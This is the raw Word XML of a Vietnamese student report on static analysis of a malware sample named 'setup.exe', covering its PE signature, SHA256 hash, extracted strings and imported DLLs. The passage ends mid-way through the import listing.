    <w:p w14:paraId="724FDCEC"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gt;Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB3DDF"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 xml:space="preserve">000000c0: 0000 0000 0000 0000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">5045 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0000 6486 0300  ........</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..d…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E182D6"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Tiếp tục so sánh với “List_of_file_signatures” thì nhóm em nhận ra rằng các file chứa trường “PE” sẽ có các tính chất sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364F1BB" w14:textId="5E9002FB"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Định dạng Portable Executable ( PE ) là định dạng tệp dành cho các tệp thực thi , mã đối tượng , DLL và các định dạng khác được sử dụng trong phiên bản 32-bit và 64-bit của hệ điều hành Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A704D" w14:textId="17E54876" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Định dạng PE là cấu trúc dữ liệu đóng gói thông tin cần thiết cho trình tải hệ điều hành Windows để quản lý mã thực thi được gói .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2EA87" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7C0B7E"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gt;Như vậy việc phân tích thêm “File Signature” cho ta biết được kiến trúc nền tảng của “setup.exe” là x32bit hoặc x64bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D1C16F" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8BF939" w14:textId="77777777" w:rsidR="00717B9C" w:rsidRDefault="00717B9C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F67EF1" w14:textId="60E4D01A" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc150717774"/>
      <w:bookmarkStart w:id="28" w:name="_Toc150718036"/>
      <w:bookmarkStart w:id="29" w:name="_Toc150718123"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.Phân tích mã hash</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="70709F31"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Quá trình tạo các giá trị băm cho các tệp nghi ngờ dựa trên nội dung của chúng, cũng giống như tạo vân tay (Fingerprinting) cho mã độc. Các thuật toán băm thường được sử dụng như MD5, SHA1 hoặc SHA256. Sử dụng các giá trị băm cho phân tích mã độc mang lại các lợi thế sau: Định danh duy nhất cho mã độc trong quá trình phân tích. Xác định một mẫu malware dựa trên tên tệp là không hiệu quả vì cùng một mẫu malware có thể sử dụng các tên tệp khác nhau, nhưng giá trị băm mã học được tính dựa trên nội dung tệp sẽ giữ nguyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B980B1F" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EF6288"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Quyết định liệu phân tích cần được thực hiện trên một mẫu duy nhất hay nhiều mẫu. Trong quá trình phân tích động, khi malware được thực thi, nó có thể sao chép chính nó đến một vị trí khác hoặc tạo ra một mẫu malware khác. Có giá trị băm mã học của mẫu sẽ giúp xác định xem mẫu mới được sao chép/hành động có giống với mẫu gốc hay không. Được sử dụng để chia sẻ cho các nhà nghiên cứu bảo mật khác khi cần xác định mẫu. Xác định nhanh xem mã độc đã được phát hiện trước đó bằng cách tìm kiếm trực tuyến hoặc tìm kiếm trong cơ sở dữ liệu của các dịch vụ quét mã độc như VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3ACB6" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06258988"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610A790B" wp14:editId="69D28DA2">
            <wp:extent cx="5731200" cy="33655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731200" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919CE7E" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E13986F"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Trước tiên nhóm em sẽ sử dụng công cụ “sha256sum” để tính toán mã băm SHA256 của file “setup.exe”.Sử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB99F0" w14:textId="451071D4"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sha256sum setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE117E0" w14:textId="6F5F4D87" w:rsidR="00403FAC" w:rsidRPr="00EE0876" w:rsidRDefault="00403FAC"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BAAA83B" wp14:editId="683C0EDB">
            <wp:extent cx="5733415" cy="443865"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="56084153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43865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD6E31" w14:textId="314EE8F4" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D93E1E"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gt;Kết quả : giá trị SHA256 của mẫu mã độc là “b5d02d5b6654c55b2d6926e4a482199043de90cb408a52e4236dd6fe84bdb6d8”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C255C0" w14:textId="67CF3D66" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65606E88" w14:textId="14737375" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc150717775"/>
      <w:bookmarkStart w:id="31" w:name="_Toc150718037"/>
      <w:bookmarkStart w:id="32" w:name="_Toc150718124"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.Phân tích strings</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="40E84EC8" w14:textId="0D789AF3"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Strings là các chuỗi ký tự ASCII và Unicode có thể hiển thị (Unicode-printable), chúng được nhúng trong một tệp. Phân tích chuỗi có thể cung cấp gợi ý về chức năng của chương trình và các chỉ số liên quan đến một tệp nhị phân (binary file) đáng nghi. Các chuỗi được trích xuất từ tệp nhị phân có chứa các tham chiếu đến tên tệp, URL, tên miền, địa chỉ IP, lệnh tấn công, registry,... thì khả năng cao là có dính mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2335AF"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Trong phần này ta sẽ sử dụng công cụ “strings” để tìm kiếm các chuỗi đọc được trong file “setup.exe” bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF4B0D" w14:textId="2C211D95"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strings -a setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EE859"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7823D287" wp14:editId="11506DA5">
            <wp:extent cx="5731200" cy="32639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731200" cy="3263900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA461C5"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gt;Dựa trên kết quả này bước đầu ta có thể xác định được một số hàm và thư viện của hệ điều hành Windows được sử dụng trong quá trình chạy “setup.exe” đặc biệt là các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434793D4" w14:textId="66DD0A22"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VirtualAlloc : Đây là một hàm trong Windows API, nó được sử dụng để cấp phát một phần bộ nhớ ảo trong quá trình thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEF24D" w14:textId="48DA9A7C"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 xml:space="preserve">+KERNEL32.dll : KERNEL32.dll là một thư viện động (DLL) quan trọng trong hệ điều hành Windows. Thư viện này cung cấp các hàm và chức năng quan trọng để quản lý và điều hành các quy trình (processes) và tác vụ (threads) trong hệ điều hành Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFDDF5C" w14:textId="6FCDACB2"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ws2_32: Đây là tên của thư viện Winsock 2.0, được sử dụng trong Windows để thực hiện giao tiếp mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EABF5"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Theo như kết quả của việc phân tích chuỗi , file “setup.exe” có một số dấu hiệu như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7A030" w14:textId="1D84D32A" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">+chứa rất ít chuỗi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BA252" w14:textId="40671682" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">+chứa rất ít hàm LoadLibrary (để gọi file .dll) và GetProcAddress (lấy địa chỉ của một hàm trong một thư viện chia sẻ) được sử dụng để tải và truy cập các hàm bổ sung. Ngoài ra 1 số hàm khác: LdrGetProcAddress, LdrLoadDll. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EF071" w14:textId="3F6880F1" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;Kết luận: file “setup.exe” đã được packed hay obfuscated</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79D423" w14:textId="77777777" w:rsidR="00C41018" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF00FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306105E6" w14:textId="77777777" w:rsidR="00717B9C" w:rsidRDefault="00717B9C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF00FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CC356B" w14:textId="77777777" w:rsidR="00717B9C" w:rsidRPr="00EE0876" w:rsidRDefault="00717B9C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECBF523" w14:textId="162A3432" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc150717776"/>
      <w:bookmarkStart w:id="34" w:name="_Toc150718038"/>
      <w:bookmarkStart w:id="35" w:name="_Toc150718125"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.Tệp tin PE</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="71884948"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Mã độc khi hoạt động cần phải tương tác với các tệp, registry, mạng và các thành phần khác. Do vậy, mã độc cần sử dụng các hàm của hệ điều hành, vd trên Windows là Application Programming Interfaces (API) và được cung cấp trong các tệp Dynamic Link Library (DLL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5EFCB" w14:textId="6C213256"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Kiểm tra các imports có thể: cung cấp một thông tin về chức năng và khả năng của mã độc và giúp dự đoán những hoạt động của nó trong quá trình thực thi. Xác định xem mã độc có được che giấu hay không?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD1C68"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Trong bước nhóm em sẽ sử dụng công cụ “API Monitor” để kiểm tra các imports được sử dụng trong file “setup.exe” này.Khởi động công cụ “API Monitor” , tạo cột trên cùng phía bên trái sẽ là nơi ta chỉ định các API để giám sát , vì muốn kết quả được đầy đủ nhất , ta sẽ chọn hết tất cả các API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F79D91" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="558B1C4C" wp14:editId="54C962C7">
            <wp:extent cx="2667000" cy="5029200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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2667000" cy="5029200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164B113"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sau đó tại cửa sổ bên cạnh , ta sẽ attach file “setup.exe” vào công cụ để tiến hành giám sát:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9E0E0"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4CDF5DF5" wp14:editId="30246EE6">
            <wp:extent cx="5731200" cy="26162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31200" cy="2616200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64A2FB"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gt;Sau khi hoàn thành các bước trên , ta sẽ thấy được các hàm , thư viện được sử dụng bởi tiến trình này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD3F9A"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="00BF40CE" wp14:editId="4425CABE">
            <wp:extent cx="5731200" cy="21590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1200" cy="2159000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DD2F5"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Dựa theo các thư viện được liệt kê ta có thể thấy được tiến trình đang sử dụng một số thư viện kiểm soát tiến trình , mạng và thư viện chứa các hàm hệ thống như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62DCF2" w14:textId="5094F4B8"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KERNEL32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2DE86" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>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78DFC5CB" wp14:editId="19344822">
            <wp:extent cx="3060700" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="635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2"/>
                    <a:srcRect b="22059"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3061152" cy="2438760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF6D68" w14:textId="7D7D0AD6"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USER32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35750780" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>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03C4FEFA" wp14:editId="31F0E70E">
            <wp:extent cx="3086100" cy="24765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23"/>
                    <a:srcRect b="27374"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3086100" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD8660" w14:textId="4115A555"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WS2_32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08F8A6" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
